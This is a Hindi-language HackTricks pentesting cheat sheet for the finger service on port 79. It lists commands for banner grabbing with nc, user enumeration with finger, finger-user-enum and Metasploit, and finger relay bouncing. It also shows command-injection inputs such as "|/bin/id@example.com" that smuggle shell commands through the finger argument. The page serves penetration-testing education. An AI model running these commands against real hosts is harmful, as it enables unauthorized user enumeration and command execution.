hacktricks/network-services-pentesting/pentesting-finger.md

6 KiB

79 - पेंटेस्टिंग फिंगर

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS रेड टीम एक्सपर्ट) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

मूल जानकारी

फिंगर एक प्रोग्राम है जिसका उपयोग आप कंप्यूटर उपयोगकर्ताओं के बारे में जानकारी खोजने के लिए कर सकते हैं। यह आमतौर पर लॉगिन नाम, पूरा नाम, और संभवतः उपयोगकर्ता के बारे में अन्य विवरण सूचीबद्ध करता है जिसे आप फिंगर कर रहे हैं। इन विवरणों में कार्यालय का स्थान और फोन नंबर (यदि ज्ञात हो), लॉगिन समय, निष्क्रिय समय, मेल अंतिम बार कब पढ़ा गया था, और उपयोगकर्ता की योजना और प्रोजेक्ट फाइलें शामिल हो सकती हैं।

डिफ़ॉल्ट पोर्ट: 79

PORT   STATE SERVICE
79/tcp open  finger

गणना

बैनर ग्रैबिंग/मूल संबंध

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

उपयोगकर्ता सूचीकरण

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

वैकल्पिक रूप से आप pentestmonkey से finger-user-enum का उपयोग कर सकते हैं, कुछ उदाहरण:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap डिफ़ॉल्ट स्क्रिप्ट्स का उपयोग करके स्क्रिप्ट निष्पादित करता है

Metasploit Nmap की तुलना में अधिक तरकीबें उपयोग करता है

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

आदेश निष्पादन

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

फिंगर बाउंस

एक सिस्टम को फिंगर रिले के रूप में उपयोग करें

finger user@host@victim
finger @internal@external
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: